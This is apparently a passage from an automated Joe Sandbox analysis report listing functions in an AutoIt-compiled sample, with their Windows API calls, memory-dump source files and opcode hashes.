                            • Instruction Fuzzy Hash: A251893060020ADBDF25CF6AC888BBEBBE5EF47314F18452DE851A7290D3798A04CB71
                            Function 00D41765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • BeginPaint.USER32(?,?), ref: 00D4179A
                            • GetWindowRect.USER32(?,?), ref: 00D417FE
                            • ScreenToClient.USER32(?,?), ref: 00D4181B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D4182C
                            • EndPaint.USER32(?,?), ref: 00D41876
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: 74e5168ca555269c4429223c2c083757cd2b534a590919a2ad32726856731869
                            • Instruction ID: 8a74455afd5cde057b8f1edecc9c9f0e2bb88244c1586bd198a85f2acb88e826
                            • Opcode Fuzzy Hash: 74e5168ca555269c4429223c2c083757cd2b534a590919a2ad32726856731869
                            • Instruction Fuzzy Hash: 19419D35100701AFD710DF25C885FBA7BE8EB45724F084629F9A4D72A1D7319889DB72
                            Function 00DCB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(00E057B0,00000000), ref: 00DCB712
                            • EnableWindow.USER32(00000000,00000000), ref: 00DCB736
                            • ShowWindow.USER32(00E057B0,00000000), ref: 00DCB796
                            • ShowWindow.USER32(00000000,00000004), ref: 00DCB7A8
                            • EnableWindow.USER32(00000000,00000001), ref: 00DCB7CC
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DCB7EF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: ade5398012104e47fa6807310631f2cbda2b69366925891e7442c46892cb6553
                            • Instruction ID: 57d28297a2366afa5387c24adfca7aa7a4f3bef7e9368cc16abdc56d940914e3
                            • Opcode Fuzzy Hash: ade5398012104e47fa6807310631f2cbda2b69366925891e7442c46892cb6553
                            • Instruction Fuzzy Hash: EE413E34640342AFDB25CF24C49AF947BE1FB45320F1C81AAED488F6A2C731E856CB61
                            Function 00DB709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00DB70AC
                              • Part of subcall function 00DB39A0: GetWindowRect.USER32(?,?), ref: 00DB39B3
                            • GetDesktopWindow.USER32 ref: 00DB70D6
                            • GetWindowRect.USER32(00000000), ref: 00DB70DD
                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00DB710F
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            • GetCursorPos.USER32(?), ref: 00DB713B
                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DB7199
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                            • String ID:
                            • API String ID: 4137160315-0
                            • Opcode ID: 1c56135898a53547c6d52219e39bfa486999bdcf6d49ce05dd340339c04c64d5
                            • Instruction ID: 4d18916b00cde2de2652f4787c9e6a3a741b4cfbf2e30c759230cc4954952585
                            • Opcode Fuzzy Hash: 1c56135898a53547c6d52219e39bfa486999bdcf6d49ce05dd340339c04c64d5
                            • Instruction Fuzzy Hash: 8631B272509306ABD720DF14D849F9BB7AAFFC9354F040919F586D7291C670EA09CBB2
                            Function 00D98879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D980C0
                              • Part of subcall function 00D980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D980CA
                              • Part of subcall function 00D980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D980D9
                              • Part of subcall function 00D980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D980E0
                              • Part of subcall function 00D980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D980F6
                            • GetLengthSid.ADVAPI32(?,00000000,00D9842F), ref: 00D988CA
                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D988D6
                            • HeapAlloc.KERNEL32(00000000), ref: 00D988DD
                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D988F6
                            • GetProcessHeap.KERNEL32(00000000,00000000,00D9842F), ref: 00D9890A
                            • HeapFree.KERNEL32(00000000), ref: 00D98911
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                            • String ID:
                            • API String ID: 3008561057-0
                            • Opcode ID: ae19fd79a3a25102920b07582e6c33b105fdd4c31e465950de3f94e800a5eeea
                            • Instruction ID: 461879e1fdbc08274d3c5ad675249d791697ab64fefffba2e7e6bf5395ee4d23
                            • Opcode Fuzzy Hash: ae19fd79a3a25102920b07582e6c33b105fdd4c31e465950de3f94e800a5eeea
                            • Instruction Fuzzy Hash: 1B116D7550160AFFDF109FA4DC09FBE7BA9EB46715F184029E885D7210CB329944EB70
                            Function 00D985B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D985E2
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00D985E9
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D985F8
                            • CloseHandle.KERNEL32(00000004), ref: 00D98603
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D98632
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D98646
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            • Opcode ID: 7d5ecfb9ccc5d49a43d64540c983271d1e3d758b1f759e2a1afd7261ca951103
                            • Instruction ID: 9217770992ab026e4599fbf1b6b5b87d8a782742511a3f50fcdf1dc4496f9fd4
                            • Opcode Fuzzy Hash: 7d5ecfb9ccc5d49a43d64540c983271d1e3d758b1f759e2a1afd7261ca951103
                            • Instruction Fuzzy Hash: 381159B250024AABDF018FA4DD49FEE7BA9EF49704F084065FE05E2260C7729D65EB70
                            Function 00D9B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 00D9B7B5
                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 00D9B7C6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 00D9B7CD
                            • ReleaseDC.USER32(00000000,00000000), ref: 00D9B7D5
                            • MulDiv.KERNEL32 ref: 00D9B7EC
                            • MulDiv.KERNEL32 ref: 00D9B7FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            • Opcode ID: 9bc6116d09656e628f899f77f6dc172e6b8a1625bc068d1bb091b31da9f1139a
                            • Instruction ID: dbab9318f8c468da53adcba7e6bb5c9551e1149ca4da3552d414c3e874b57aed
                            • Opcode Fuzzy Hash: 9bc6116d09656e628f899f77f6dc172e6b8a1625bc068d1bb091b31da9f1139a
                            • Instruction Fuzzy Hash: 8D017175A4030ABBEF109BE69D45E5EBFB9EB48761F044066FA08E7391D6309C00CFA0
                            Function 00D60162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D60193
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6019B
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D601A6
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D601B1
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D601B9
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D601C1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: 26bef04d467e16e98eff7f081fe100032042ff12582e994e4f8b43fea371b2d5
                            • Instruction ID: 724f31bd74c7f128cec7b8fd7575ec4cd65346c7cc980d2ab599e8a75d5d5df9
                            • Opcode Fuzzy Hash: 26bef04d467e16e98eff7f081fe100032042ff12582e994e4f8b43fea371b2d5
                            • Instruction Fuzzy Hash: A9016CB094175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5
                            Function 00DA53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32 ref: 00DA53F9
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DA540F
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00DA541E
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA542D
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA5437
                            • CloseHandle.KERNEL32(00000000), ref: 00DA543E
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: 9b4e9982dd6126c8b1d9e529406ed8814b6a4916abcd705f93d32d0f58b104ac
                            • Instruction ID: 05d97aa6a3ed0b2a30f3c551e514a7d70582313f523db380a95b28d11a5c56c4
                            • Opcode Fuzzy Hash: 9b4e9982dd6126c8b1d9e529406ed8814b6a4916abcd705f93d32d0f58b104ac
                            • Instruction Fuzzy Hash: 81F0903228065ABBE7205BA2DC0DEEF7B7DEFCAB11F040169FA04D1150D7A11A0186B5
                            Function 00DA7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,?,?,?,?,00D85D3D,?,?,?,?,00D50EE4,?,?), ref: 00DA7243
                            • EnterCriticalSection.KERNEL32(?,?,00D50EE4,?,?), ref: 00DA7254
                            • TerminateThread.KERNEL32(00000000,000001F6,?,00D50EE4,?,?), ref: 00DA7261
                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00D50EE4,?,?), ref: 00DA726E
                              • Part of subcall function 00DA6C35: CloseHandle.KERNEL32(00000000), ref: 00DA6C3F
                            • InterlockedExchange.KERNEL32(?,000001F6,?,00D50EE4,?,?), ref: 00DA7281
                            • LeaveCriticalSection.KERNEL32(?,?,00D50EE4,?,?), ref: 00DA7288
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: c9037b2f35993ec81c691f8baeb39ea919d4fec4b5157f426eabc9aea422b52b
                            • Instruction ID: 9a98489063c6f81c0a88a6646866ac122e6518dea104cb26710585688758dfa3
                            • Opcode Fuzzy Hash: c9037b2f35993ec81c691f8baeb39ea919d4fec4b5157f426eabc9aea422b52b
                            • Instruction Fuzzy Hash: 38F05E36540713EBE7111B64ED4CEDAB73AEF45712B140532F643D11A0CB765801CB74
                            Function 00D98992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D9899D
                            • UnloadUserProfile.USERENV(?,?), ref: 00D989A9
                            • CloseHandle.KERNEL32(?), ref: 00D989B2
                            • CloseHandle.KERNEL32(?), ref: 00D989BA
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D989C3
                            • HeapFree.KERNEL32(00000000), ref: 00D989CA
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: f12604e5deed2098f6a9fb49c9c9394e32abc75de0dac6bb822c648adf54c105
                            • Instruction ID: 6af029198fa5912a0ff705927ae8496d6fff6df8ace3b90522814cba6e9c5a7f
                            • Opcode Fuzzy Hash: f12604e5deed2098f6a9fb49c9c9394e32abc75de0dac6bb822c648adf54c105
                            • Instruction Fuzzy Hash: 98E05976104607FBD6011FE5EC0CD95BB6AFB997627544631F215C1670CB326461DB60
                            Function 00DB85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00DB8613
                            • CharUpperBuffW.USER32(?,?), ref: 00DB8722
                            • VariantClear.OLEAUT32(?), ref: 00DB889A
                              • Part of subcall function 00DA7562: VariantInit.OLEAUT32(00000000), ref: 00DA75A2
                              • Part of subcall function 00DA7562: VariantCopy.OLEAUT32(00000000,?), ref: 00DA75AB
                              • Part of subcall function 00DA7562: VariantClear.OLEAUT32(00000000), ref: 00DA75B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: a90702a2d3a506936d045716488954efcac875f9ead065dac27a3820b9e79ab4
                            • Instruction ID: 3718f1bacdd820ded78c76b1fa1423e7831395d01d703c09334e802141ffb130
                            • Opcode Fuzzy Hash: a90702a2d3a506936d045716488954efcac875f9ead065dac27a3820b9e79ab4
                            • Instruction Fuzzy Hash: 00915C74604301DFC710DF25C48599ABBE8EF89714F14896EF89A8B361DB31E945CB72
                            Function 00DA2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • _memset.LIBCMT ref: 00DA2B87
                            • GetMenuItemInfoW.USER32 ref: 00DA2BB6
                            • SetMenuItemInfoW.USER32 ref: 00DA2C69
                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DA2C97
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                            • String ID: 0
                            • API String ID: 4152858687-4108050209
                            • Opcode ID: d184c45ad59de56d065b70493f4b6da3b636c894a2cb560e803520652fdf5e35
                            • Instruction ID: a52a9bc72bf3663dedde4a1ae428c031a520bb6a17d168cd5d41550d0052a715
                            • Opcode Fuzzy Hash: d184c45ad59de56d065b70493f4b6da3b636c894a2cb560e803520652fdf5e35
                            • Instruction Fuzzy Hash: C9519C716083019BD7249F2ED845A7FBBE4EB9A320F080A29F895D71D1DB74CD448B72
                            Function 00D9D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00D9D5D4
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D9D60A
                            • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00D9D61B
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D9D69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: DllGetClassObject
                            • API String ID: 753597075-1075368562
                            • Opcode ID: 530d118dcf158f396cc2f45831fe5e274700b7d75c3dc6ab9b6526cd6a6cebdc
                            • Instruction ID: b055425d61df7269bedc18e41adddf56fcbb479b5d8fdb4118142f7264a745b9
                            • Opcode Fuzzy Hash: 530d118dcf158f396cc2f45831fe5e274700b7d75c3dc6ab9b6526cd6a6cebdc
                            • Instruction Fuzzy Hash: BD411BB2600209EFDF15DF64C884AAABBBAEF54314F1581A9AD099F205D7B1D944CBB0
                            Function 00DA2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: ec3fadc565dcc72305ba8fcf14e215ccb16d03e377cc6e9f55426b8037addf49
                            • Instruction ID: 4c33c6b50f61fbfbf161136891dde637fee5460fc40fc757c958f2dc504f9c00
                            • Opcode Fuzzy Hash: ec3fadc565dcc72305ba8fcf14e215ccb16d03e377cc6e9f55426b8037addf49
                            • Instruction Fuzzy Hash: 41418E706043429FDB20DF2AC844F6ABBE9EF86314F14492DF9A597291DB34E905CB72
                            Function 00DBD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DBD7C5
                              • Part of subcall function 00D4784B: _memmove.LIBCMT ref: 00D47899
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharLower_memmove
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 3425801089-567219261
                            • Opcode ID: 14e85327027268768fec5bb9e925a2b5052b556d99d9b2a6a6ea46afcf987799
                            • Instruction ID: 42651f8fe34ccd990d1af47491d3884028514da2c990c49bb33f52e9e7d20928
                            • Opcode Fuzzy Hash: 14e85327027268768fec5bb9e925a2b5052b556d99d9b2a6a6ea46afcf987799
                            • Instruction Fuzzy Hash: FE31AF7590461AEBCF00EF54C8519FEB7B5FF04320B10862AE866A77D1EB31A905CBB0
                            Function 00D98E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
